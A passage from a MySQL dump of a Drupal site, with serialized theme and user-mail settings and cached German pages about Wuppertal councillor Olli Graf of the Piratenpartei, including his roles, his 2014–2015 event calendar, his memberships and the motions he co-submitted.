Rat\";s:24:\"statistics_day_timestamp\";i:1451312069;s:21:\"theme_bartik_settings\";a:18:{s:11:\"toggle_logo\";i:1;s:11:\"toggle_name\";i:1;s:13:\"toggle_slogan\";i:1;s:24:\"toggle_node_user_picture\";i:1;s:27:\"toggle_comment_user_picture\";i:1;s:32:\"toggle_comment_user_verification\";i:1;s:14:\"toggle_favicon\";i:1;s:16:\"toggle_main_menu\";i:1;s:21:\"toggle_secondary_menu\";i:1;s:12:\"default_logo\";i:0;s:9:\"logo_path\";s:31:\"public://Piratensegel Klein.png\";s:15:\"default_favicon\";i:1;s:12:\"favicon_path\";s:0:\"\";s:14:\"favicon_upload\";s:0:\"\";s:6:\"scheme\";s:0:\"\";s:7:\"palette\";a:9:{s:3:\"top\";s:7:\"#c7750f\";s:6:\"bottom\";s:7:\"#c7380f\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}s:5:\"theme\";s:6:\"bartik\";s:4:\"info\";a:12:{s:6:\"fields\";a:9:{s:3:\"top\";s:10:\"Header top\";s:6:\"bottom\";s:13:\"Header bottom\";s:2:\"bg\";s:15:\"Main background\";s:7:\"sidebar\";s:18:\"Sidebar background\";s:14:\"sidebarborders\";s:15:\"Sidebar borders\";s:6:\"footer\";s:17:\"Footer background\";s:11:\"titleslogan\";s:16:\"Title and slogan\";s:4:\"text\";s:10:\"Text color\";s:4:\"link\";s:10:\"Link color\";}s:7:\"schemes\";a:6:{s:7:\"default\";a:2:{s:5:\"title\";s:21:\"Blue Lagoon (default)\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#0779bf\";s:6:\"bottom\";s:7:\"#48a9e4\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}}s:9:\"firehouse\";a:2:{s:5:\"title\";s:9:\"Firehouse\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#cd2d2d\";s:6:\"bottom\";s:7:\"#cf3535\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f1f4f0\";s:14:\"sidebarborders\";s:7:\"#ededed\";s:6:\"footer\";s:7:\"#1f1d1c\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#d6121f\";}}s:3:\"ice\";a:2:{s:5:\"title\";s:3:\"Ice\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#d0d0d0\";s:6:\"bottom\";s:7:\"#c2c4c5\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#cccccc\";s:6:\"footer\";s:7:\"#24272c\";s:11:\"titleslogan\";s:7:\"#000000\";s:4:\"text\";s:7:\"#4a4a4a\";s:4:\"link\";s:7:\"#019dbf\";}}s:4:\"plum\";a:2:{s:5:\"title\";s:4:\"Plum\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4c1c58\";s:6:\"bottom\";s:7:\"#593662\";s:2:\"bg\";s:7:\"#fffdf7\";s:7:\"sidebar\";s:7:\"#edede7\";s:14:\"sidebarborders\";s:7:\"#e7e7e7\";s:6:\"footer\";s:7:\"#2c2c28\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#301313\";s:4:\"link\";s:7:\"#9d408d\";}}s:5:\"slate\";a:2:{s:5:\"title\";s:5:\"Slate\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4a4a4a\";s:6:\"bottom\";s:7:\"#4e4e4e\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#d0d0d0\";s:6:\"footer\";s:7:\"#161617\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0073b6\";}}s:0:\"\";a:2:{s:5:\"title\";s:6:\"Custom\";s:6:\"colors\";a:0:{}}}s:3:\"css\";a:1:{i:0;s:14:\"css/colors.css\";}s:4:\"copy\";a:1:{i:0;s:8:\"logo.png\";}s:9:\"gradients\";a:1:{i:0;a:3:{s:9:\"dimension\";a:4:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;}s:9:\"direction\";s:8:\"vertical\";s:6:\"colors\";a:2:{i:0;s:3:\"top\";i:1;s:6:\"bottom\";}}}s:4:\"fill\";a:0:{}s:6:\"slices\";a:0:{}s:12:\"blend_target\";s:7:\"#ffffff\";s:11:\"preview_css\";s:17:\"color/preview.css\";s:10:\"preview_js\";s:16:\"color/preview.js\";s:12:\"preview_html\";s:18:\"color/preview.html\";s:10:\"base_image\";s:14:\"color/base.png\";}}s:13:\"theme_default\";s:17:\"responsive_bartik\";s:32:\"theme_responsive_bartik_settings\";a:19:{s:11:\"toggle_logo\";i:1;s:11:\"toggle_name\";i:1;s:13:\"toggle_slogan\";i:1;s:24:\"toggle_node_user_picture\";i:1;s:27:\"toggle_comment_user_picture\";i:1;s:32:\"toggle_comment_user_verification\";i:1;s:14:\"toggle_favicon\";i:1;s:16:\"toggle_main_menu\";i:1;s:21:\"toggle_secondary_menu\";i:1;s:12:\"default_logo\";i:0;s:9:\"logo_path\";s:32:\"public://120px-PIRATENsignet.png\";s:11:\"logo_upload\";s:0:\"\";s:15:\"default_favicon\";i:0;s:12:\"favicon_path\";s:49:\"public://eababaad47803cb6543076898ba0ae58.ico.png\";s:6:\"scheme\";s:0:\"\";s:7:\"palette\";a:9:{s:3:\"top\";s:7:\"#8e2105\";s:6:\"bottom\";s:7:\"#c3741d\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}s:5:\"theme\";s:17:\"responsive_bartik\";s:4:\"info\";a:12:{s:6:\"fields\";a:9:{s:3:\"top\";s:10:\"Header top\";s:6:\"bottom\";s:13:\"Header bottom\";s:2:\"bg\";s:15:\"Main background\";s:7:\"sidebar\";s:18:\"Sidebar background\";s:14:\"sidebarborders\";s:15:\"Sidebar borders\";s:6:\"footer\";s:17:\"Footer background\";s:11:\"titleslogan\";s:16:\"Title and slogan\";s:4:\"text\";s:10:\"Text color\";s:4:\"link\";s:10:\"Link color\";}s:7:\"schemes\";a:6:{s:7:\"default\";a:2:{s:5:\"title\";s:21:\"Blue Lagoon (default)\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#055a8e\";s:6:\"bottom\";s:7:\"#1d84c3\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}}s:9:\"firehouse\";a:2:{s:5:\"title\";s:9:\"Firehouse\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#cd2d2d\";s:6:\"bottom\";s:7:\"#cf3535\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f1f4f0\";s:14:\"sidebarborders\";s:7:\"#ededed\";s:6:\"footer\";s:7:\"#1f1d1c\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#d6121f\";}}s:3:\"ice\";a:2:{s:5:\"title\";s:3:\"Ice\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#d0d0d0\";s:6:\"bottom\";s:7:\"#c2c4c5\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#cccccc\";s:6:\"footer\";s:7:\"#24272c\";s:11:\"titleslogan\";s:7:\"#000000\";s:4:\"text\";s:7:\"#4a4a4a\";s:4:\"link\";s:7:\"#019dbf\";}}s:4:\"plum\";a:2:{s:5:\"title\";s:4:\"Plum\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4c1c58\";s:6:\"bottom\";s:7:\"#593662\";s:2:\"bg\";s:7:\"#fffdf7\";s:7:\"sidebar\";s:7:\"#edede7\";s:14:\"sidebarborders\";s:7:\"#e7e7e7\";s:6:\"footer\";s:7:\"#2c2c28\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#301313\";s:4:\"link\";s:7:\"#9d408d\";}}s:5:\"slate\";a:2:{s:5:\"title\";s:5:\"Slate\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4a4a4a\";s:6:\"bottom\";s:7:\"#4e4e4e\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#d0d0d0\";s:6:\"footer\";s:7:\"#161617\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0073b6\";}}s:0:\"\";a:2:{s:5:\"title\";s:6:\"Custom\";s:6:\"colors\";a:0:{}}}s:3:\"css\";a:1:{i:0;s:14:\"css/colors.css\";}s:4:\"copy\";a:1:{i:0;s:8:\"logo.png\";}s:9:\"gradients\";a:1:{i:0;a:3:{s:9:\"dimension\";a:4:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;}s:9:\"direction\";s:8:\"vertical\";s:6:\"colors\";a:2:{i:0;s:3:\"top\";i:1;s:6:\"bottom\";}}}s:4:\"fill\";a:0:{}s:6:\"slices\";a:0:{}s:12:\"blend_target\";s:7:\"#ffffff\";s:11:\"preview_css\";s:17:\"color/preview.css\";s:10:\"preview_js\";s:16:\"color/preview.js\";s:12:\"preview_html\";s:18:\"color/preview.html\";s:10:\"base_image\";s:14:\"color/base.png\";}s:16:\"favicon_mimetype\";s:9:\"image/png\";}s:17:\"update_last_check\";i:1451312074;s:30:\"update_last_email_notification\";i:1445543400;s:20:\"update_notify_emails\";a:1:{i:0;s:15:\"olli@ollital.de\";}s:15:\"user_admin_role\";s:1:\"3\";s:18:\"user_cancel_method\";s:17:\"user_cancel_block\";s:21:\"user_default_timezone\";s:1:\"0\";s:23:\"user_email_verification\";i:1;s:29:\"user_mail_cancel_confirm_body\";s:381:\"[user:name],\r\n\r\nA request to cancel your account has been made at [site:name].\r\n\r\nYou may now cancel your account on [site:url-brief] by clicking this link or copying and pasting it into your browser:\r\n\r\n[user:cancel-url]\r\n\r\nNOTE: The cancellation of your account is not reversible.\r\n\r\nThis link expires in one day and nothing will happen if it is not used.\r\n\r\n-- [site:name] team\";s:32:\"user_mail_cancel_confirm_subject\";s:59:\"Account cancellation request for [user:name] at [site:name]\";s:29:\"user_mail_password_reset_body\";s:407:\"[user:name],\r\n\r\nA request to reset the password for your account has been made at [site:name].\r\n\r\nYou may now log in by clicking this link or copying and pasting it to your browser:\r\n\r\n[user:one-time-login-url]\r\n\r\nThis link can only be used once to log in and will lead you to a page where you can set your password. It expires after one day and nothing will happen if it\'s not used.\r\n\r\n-- [site:name] team\";s:32:\"user_mail_password_reset_subject\";s:60:\"Replacement login information for [user:name] at [site:name]\";s:37:\"user_mail_register_admin_created_body\";s:476:\"[user:name],\r\n\r\nA site administrator at [site:name] has created an account for you. You may now log in by clicking this link or copying and pasting it to your browser:\r\n\r\n[user:one-time-login-url]\r\n\r\nThis link can only be used once to log in and will lead you to a page where you can set your password.\r\n\r\nAfter setting your password, you will be able to log in at [site:login-url] in the future using:\r\n\r\nusername: [user:name]\r\npassword: Your password\r\n\r\n-- [site:name] team\";s:40:\"user_mail_register_admin_created_subject\";s:58:\"An administrator created an account for you at [site:name]\";s:44:\"user_mail_register_no_approval_required_body\";s:450:\"[user:name],\r\n\r\nThank you for registering at [site:name]. You may now log in by clicking this link or copying and pasting it to your browser:\r\n\r\n[user:one-time-login-url]\r\n\r\nThis link can only be used once to log in and will lead you to a page where you can set your password.\r\n\r\nAfter setting your password, you will be able to log in at [site:login-url] in the future using:\r\n\r\nusername: [user:name]\r\npassword: Your password\r\n\r\n-- [site:name] team\";s:47:\"user_mail_register_no_approval_required_subject\";s:46:\"Account details for [user:name] at [site:name]\";s:40:\"user_mail_register_pending_approval_body\";s:287:\"[user:name],\r\n\r\nThank you for registering at [site:name]. Your application for an account is currently pending approval. Once it has been approved, you will receive another e-mail containing information about how to log in, set your password, and other details.\r\n\r\n\r\n-- [site:name] team\";s:43:\"user_mail_register_pending_approval_subject\";s:71:\"Account details for [user:name] at [site:name] (pending admin approval)\";s:31:\"user_mail_status_activated_body\";s:461:\"[user:name],\r\n\r\nYour account at [site:name] has been activated.\r\n\r\nYou may now log in by clicking this link or copying and pasting it into your browser:\r\n\r\n[user:one-time-login-url]\r\n\r\nThis link can only be used once to log in and will lead you to a page where you can set your password.\r\n\r\nAfter setting your password, you will be able to log in at [site:login-url] in the future using:\r\n\r\nusername: [user:name]\r\npassword: Your password\r\n\r\n-- [site:name] team\";s:33:\"user_mail_status_activated_notify\";i:1;s:34:\"user_mail_status_activated_subject\";s:57:\"Account details for [user:name] at [site:name] (approved)\";s:29:\"user_mail_status_blocked_body\";s:85:\"[user:name],\r\n\r\nYour account on [site:name] has been blocked.\r\n\r\n-- [site:name] team\";s:31:\"user_mail_status_blocked_notify\";i:0;s:32:\"user_mail_status_blocked_subject\";s:56:\"Account details for [user:name] at [site:name] (blocked)\";s:30:\"user_mail_status_canceled_body\";s:86:\"[user:name],\r\n\r\nYour account on [site:name] has been canceled.\r\n\r\n-- [site:name] team\";s:32:\"user_mail_status_canceled_notify\";i:0;s:33:\"user_mail_status_canceled_subject\";s:57:\"Account details for [user:name] at [site:name] (canceled)\";s:13:\"user_pictures\";i:1;s:20:\"user_picture_default\";s:0:\"\";s:23:\"user_picture_dimensions\";s:9:\"1024x1024\";s:22:\"user_picture_file_size\";s:3:\"800\";s:23:\"user_picture_guidelines\";s:0:\"\";s:17:\"user_picture_path\";s:8:\"pictures\";s:18:\"user_picture_style\";s:9:\"thumbnail\";s:13:\"user_register\";s:1:\"0\";s:15:\"user_signatures\";i:0;}',0,1451358991,1); /*!40000 ALTER TABLE `cache_bootstrap` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache_field` -- DROP TABLE IF EXISTS `cache_field`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cache_field` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for the Field module to store already built...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache_field` -- LOCK TABLES `cache_field` WRITE; /*!40000 ALTER TABLE `cache_field` DISABLE KEYS */; INSERT INTO `cache_field` VALUES ('field:node:3','a:3:{s:4:\"body\";a:1:{s:3:\"und\";a:1:{i:0;a:5:{s:5:\"value\";s:320:\"Olli Graf\r\n
                    \r\n
                  • Stadtverordneter im Rat der Stadt Wuppertal
                  • \r\n
                  • Mitglied im Betriebsauschuss Gebäudemanagement
                  • \r\n
                  • beratendes Mitglied im Auschuss für Stadtentwicklung, Wirtschaft und Bauen (StaWiBau)
                  • \r\n
                  • Mitglied der Piratenpartei
                  • \r\n
                  • Mitglied der Fraktion Bündnis 90/ Die Grünen
                  • \r\n\";s:7:\"summary\";s:0:\"\";s:6:\"format\";s:13:\"filtered_html\";s:10:\"safe_value\";s:324:\"

                    Olli Graf

                    \n
                    • Stadtverordneter im Rat der Stadt Wuppertal
                    • \n
                    • Mitglied im Betriebsauschuss Gebäudemanagement
                    • \n
                    • beratendes Mitglied im Auschuss für Stadtentwicklung, Wirtschaft und Bauen (StaWiBau)
                    • \n
                    • Mitglied der Piratenpartei
                    • \n
                    • Mitglied der Fraktion Bündnis 90/ Die Grünen
                    • \n
                    \";s:12:\"safe_summary\";s:0:\"\";}}}s:10:\"field_tags\";a:0:{}s:11:\"field_image\";a:0:{}}',0,1444940208,1),('field:node:4','a:3:{s:4:\"body\";a:1:{s:3:\"und\";a:1:{i:0;a:5:{s:5:\"value\";s:3601:\"21.11.2014 Tag der Offenen Tür AIDS-Hilfe Wuppertal\r\n23.11.2014 Kreismitgliederversammlung\r\n26.11.2014 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n26.11.2014 Bürgerbegehren gegen den Verkauf des Carnaper Platzes\r\n01.12.2014 Filmpremiere – Dokumentation »Stigma ADHS« zum Thema ADHS bei Kindern\r\n03.12.2014 BV Elberfeld\r\n09.12.2014 BV Barmen\r\n15.12.2014 Ratssitzung\r\n19.12.2014 offiz. Eröffnung der Nordbahntrasse\r\n\r\nJanuar\r\n11.02.2015 Wuppertal 3.0\r\n24.02.2015 BV Barmen\r\n25.02.2015 BV Elberfeld\r\n\r\n\r\n18.01.2015 Neujahrsempfang Bürgerverein Langerfeld und Förderverein der Gesamtschule Langerfeld\r\n28.01. 2015 BV Elberfeld\r\n\r\nFebruar\r\n09.02.2015 Gemeinsame Sondersitzung der Ausschüsse Finanzen,StaWiBau und Beteiligungssteuerung\r\n10.02.2015 Ratssondersitzung\r\n\r\nMärz\r\n3.03.2015 Wuppertal 3.0\r\n09.03.2015 Ratssitzung\r\n25.03.2015 Wuppertal 3.0\r\n26.03.2015 Sondersitzung StaWiBau\r\n26.03.2015 Ratssondersitzung\r\n\r\nApril\r\n14.04.2015 Wuppertal 3.0\r\n17.04.2015 70. Jahrestag der Befreiung vom Nationalsozialismus in Wuppertal (Gedenkfeier und Befreiungsfest)\r\n18.04.2015 Landesparteitag 2015.1\r\n19.04.2015 Landesparteitag 2015.1\r\n23.04.2015 Betriebsauschuss Gebäudemanagement (fällt aus)\r\n28.04.2014 BV Barmen\r\n29.04.2015 BV Elberfeld\r\n30.04.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nMai\r\n06.05.2015 Wuppertal 3.0\r\n11.05.2015 Ratssitzung\r\n13.05.2015 Beirat der Menschen mit Behinderung (Vetretung)\r\n19.05.2015 Auftaktveranstaltung Seilbahnprojekt\r\n20.05.2015 Diskussionsveranstaltung \"Das solidarische Bürgerticket\"\r\n21.05.2015 Wuppertal 3.0\r\n30.05.2015 Wuppertal 3.0\r\n\r\nJuni\r\n04.06.2015 Barmen Live\r\n06.06.2015 kommunales Mandatsträgertreffen\r\n09.06.2015 BV Barmen\r\n10.06.2015 BV Elberfeld\r\n11.06.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n11.06.2015 Ausstellung und Gespräch Seilbahnprojekt\r\n13.06.2015 Freiheit statt Angst Demo Düsseldorf\r\n16.06.2015 Infotermin mit Ausstellung Seilbahnprojekt\r\n16.06.2015 Podiumsdiskussion über ein bedingungsloses Grundeinkommen\r\n22.06.2015 Ratssitzung\r\n24.06.2015 Infoveranstaltung Ausbau L 419\r\n29.06.2015 Beginn der Sommerferien\r\n\r\nJuli\r\n23.07.20.15 Sondersitzung Stadtentwicklung, Wirtschaft und Bauen\r\n25.07.2015 Bundesparteitag 2015.1\r\n26.07.2015 Bundesparteitag 2015.1\r\n28.07.2015 Wahlausschuss für die Oberbürgermeisterwahl am 13. September 2015\r\n\r\nAugust\r\n17.08.2015 Ratssitzung\r\n20.08.2015 Betriebsauschuss Gebäudemanagement\r\n25.08.2015 BV Barmen\r\n27.08.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nSeptember\r\n01.09.2015 Ausschuss für Gleichstellung (Vertretung)\r\n05.09.2015 Heckinghausen ist bunt - für alle (Demo)\r\n07.09.2015 Ratssitzung\r\n13.09.2015 Oberbürgermeisterwahl\r\n15.09.2015 Wahlausschuss\r\n17.09.2015 Mit uns TTIP & CETA durchschauen!\r\n20.09.2015 kommunales Vernetzungstreffen\r\n\r\nOktober\r\n24./25.10.2015 Landesparteitag in Aachen\r\n27.10.2015 Ratssitzung\r\n28.10.2015 BV Elberfeld\r\n29.10.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nNovember\r\n09.11.2015 Ratssitzung\r\n10.11.2015 Letzte Ausfahrt Paris 2015 -Ende oder Wende\r\n23.11.2015 Eröffnung Lichtermarkt Elberfeld /Weihnachtsmarkt Barmen\r\n26.11.2015 Betriebsausschuss Gebäudemanagement\r\n\r\nDezember\r\n02.12.2015 BV Elberfeld\r\n03.12.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n14.12.2015 Ratssitzung\r\n\r\n\r\nJeden 2. und 4. Donnerstag eines Monats Stammtisch im Abgeordnetenbüro Wichlinghauser Str. 61\r\n\";s:7:\"summary\";s:0:\"\";s:6:\"format\";s:13:\"filtered_html\";s:10:\"safe_value\";s:4023:\"

                    21.11.2014 Tag der Offenen Tür AIDS-Hilfe Wuppertal
                    \n23.11.2014 Kreismitgliederversammlung
                    \n26.11.2014 Ausschuss Stadtentwicklung, Wirtschaft und Bauen
                    \n26.11.2014 Bürgerbegehren gegen den Verkauf des Carnaper Platzes
                    \n01.12.2014 Filmpremiere – Dokumentation »Stigma ADHS« zum Thema ADHS bei Kindern
                    \n03.12.2014 BV Elberfeld
                    \n09.12.2014 BV Barmen
                    \n15.12.2014 Ratssitzung
                    \n19.12.2014 offiz. Eröffnung der Nordbahntrasse

                    \n

                    Januar
                    \n11.02.2015 Wuppertal 3.0
                    \n24.02.2015 BV Barmen
                    \n25.02.2015 BV Elberfeld

                    \n

                    18.01.2015 Neujahrsempfang Bürgerverein Langerfeld und Förderverein der Gesamtschule Langerfeld
                    \n28.01. 2015 BV Elberfeld

                    \n

                    Februar
                    \n09.02.2015 Gemeinsame Sondersitzung der Ausschüsse Finanzen,StaWiBau und Beteiligungssteuerung
                    \n10.02.2015 Ratssondersitzung

                    \n

                    März
                    \n3.03.2015 Wuppertal 3.0
                    \n09.03.2015 Ratssitzung
                    \n25.03.2015 Wuppertal 3.0
                    \n26.03.2015 Sondersitzung StaWiBau
                    \n26.03.2015 Ratssondersitzung

                    \n

                    April
                    \n14.04.2015 Wuppertal 3.0
                    \n17.04.2015 70. Jahrestag der Befreiung vom Nationalsozialismus in Wuppertal (Gedenkfeier und Befreiungsfest)
                    \n18.04.2015 Landesparteitag 2015.1
                    \n19.04.2015 Landesparteitag 2015.1
                    \n23.04.2015 Betriebsauschuss Gebäudemanagement (fällt aus)
                    \n28.04.2014 BV Barmen
                    \n29.04.2015 BV Elberfeld
                    \n30.04.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen

                    \n

                    Mai
                    \n06.05.2015 Wuppertal 3.0
                    \n11.05.2015 Ratssitzung
                    \n13.05.2015 Beirat der Menschen mit Behinderung (Vetretung)
                    \n19.05.2015 Auftaktveranstaltung Seilbahnprojekt
                    \n20.05.2015 Diskussionsveranstaltung \"Das solidarische Bürgerticket\"
                    \n21.05.2015 Wuppertal 3.0
                    \n30.05.2015 Wuppertal 3.0

                    \n

                    Juni
                    \n04.06.2015 Barmen Live
                    \n06.06.2015 kommunales Mandatsträgertreffen
                    \n09.06.2015 BV Barmen
                    \n10.06.2015 BV Elberfeld
                    \n11.06.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen
                    \n11.06.2015 Ausstellung und Gespräch Seilbahnprojekt
                    \n13.06.2015 Freiheit statt Angst Demo Düsseldorf
                    \n16.06.2015 Infotermin mit Ausstellung Seilbahnprojekt
                    \n16.06.2015 Podiumsdiskussion über ein bedingungsloses Grundeinkommen
                    \n22.06.2015 Ratssitzung
                    \n24.06.2015 Infoveranstaltung Ausbau L 419
                    \n29.06.2015 Beginn der Sommerferien

                    \n

                    Juli
                    \n23.07.20.15 Sondersitzung Stadtentwicklung, Wirtschaft und Bauen
                    \n25.07.2015 Bundesparteitag 2015.1
                    \n26.07.2015 Bundesparteitag 2015.1
                    \n28.07.2015 Wahlausschuss für die Oberbürgermeisterwahl am 13. September 2015

                    \n

                    August
                    \n17.08.2015 Ratssitzung
                    \n20.08.2015 Betriebsauschuss Gebäudemanagement
                    \n25.08.2015 BV Barmen
                    \n27.08.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen

                    \n

                    September
                    \n01.09.2015 Ausschuss für Gleichstellung (Vertretung)
                    \n05.09.2015 Heckinghausen ist bunt - für alle (Demo)
                    \n07.09.2015 Ratssitzung
                    \n13.09.2015 Oberbürgermeisterwahl
                    \n15.09.2015 Wahlausschuss
                    \n17.09.2015 Mit uns TTIP & CETA durchschauen!
                    \n20.09.2015 kommunales Vernetzungstreffen

                    \n

                    Oktober
                    \n24./25.10.2015 Landesparteitag in Aachen
                    \n27.10.2015 Ratssitzung
                    \n28.10.2015 BV Elberfeld
                    \n29.10.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen

                    \n

                    November
                    \n09.11.2015 Ratssitzung
                    \n10.11.2015 Letzte Ausfahrt Paris 2015 -Ende oder Wende
                    \n23.11.2015 Eröffnung Lichtermarkt Elberfeld /Weihnachtsmarkt Barmen
                    \n26.11.2015 Betriebsausschuss Gebäudemanagement

                    \n

                    Dezember
                    \n02.12.2015 BV Elberfeld
                    \n03.12.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen
                    \n14.12.2015 Ratssitzung

                    \n

                    Jeden 2. und 4. Donnerstag eines Monats Stammtisch im Abgeordnetenbüro Wichlinghauser Str. 61

                    \n\";s:12:\"safe_summary\";s:0:\"\";}}}s:10:\"field_tags\";a:1:{s:3:\"und\";a:1:{i:0;a:1:{s:3:\"tid\";s:1:\"3\";}}}s:11:\"field_image\";a:0:{}}',0,1446488130,1),('field:node:5','a:3:{s:4:\"body\";a:1:{s:3:\"und\";a:1:{i:0;a:5:{s:5:\"value\";s:305:\"Ich bin Mitglied in folgenden Organisationen:\r\n\r\n
                      \r\n
                    • ASV -Allgemeiner Sportverein Wuppertal e.V.
                    • \r\n
                    • ADAC - Allgemeiner Deutscher Automobilclub e.V.
                    • \r\n
                    • Musikpiraten e.V.
                    • \r\n
                    • NAG - Neue Assekuranz Gewerkschaft
                    • \r\n
                    • Piratenpartei NRW
                    • \r\n
                    • piKo NRW e.V.
                    • \r\n
                    \";s:7:\"summary\";s:0:\"\";s:6:\"format\";s:13:\"filtered_html\";s:10:\"safe_value\";s:295:\"

                    Ich bin Mitglied in folgenden Organisationen:

                    \n
                    • ASV -Allgemeiner Sportverein Wuppertal e.V.
                    • \n
                    • ADAC - Allgemeiner Deutscher Automobilclub e.V.
                    • \n
                    • Musikpiraten e.V.
                    • \n
                    • NAG - Neue Assekuranz Gewerkschaft
                    • \n
                    • Piratenpartei NRW
                    • \n
                    • piKo NRW e.V.
                    • \n
                    \";s:12:\"safe_summary\";s:0:\"\";}}}s:10:\"field_tags\";a:0:{}s:11:\"field_image\";a:0:{}}',0,1444940217,1),('field:node:6','a:3:{s:4:\"body\";a:1:{s:3:\"und\";a:1:{i:0;a:5:{s:5:\"value\";s:596:\"Diese Anträge habe ich (in Zusammenarbeit mit anderen Fraktionen) miteingereicht.\r\n\r\n30.09.2014 Ja zur kommunalen Selbstverwaltung und zur kommunalen Daseinsvorsorge\r\n10.02.2015 Aufhebung des Ratsbeschlusses zum Verkauf des Carnaper Platzes\r\n22.06.2015 Öffentliches WLAN in Wuppertal fördern - Freifunk-Standorte auf städtischen Gebäuden einrichten\r\n\";s:7:\"summary\";s:0:\"\";s:6:\"format\";s:13:\"filtered_html\";s:10:\"safe_value\";s:616:\"

                    Diese Anträge habe ich (in Zusammenarbeit mit anderen Fraktionen) miteingereicht.

                    \n

                    30.09.2014 Ja zur kommunalen Selbstverwaltung und zur kommunalen Daseinsvorsorge
                    \n10.02.2015 Aufhebung des Ratsbeschlusses zum Verkauf des Carnaper Platzes
                    \n22.06.2015 Öffentliches WLAN in Wuppertal fördern - Freifunk-Standorte auf städtischen Gebäuden einrichten

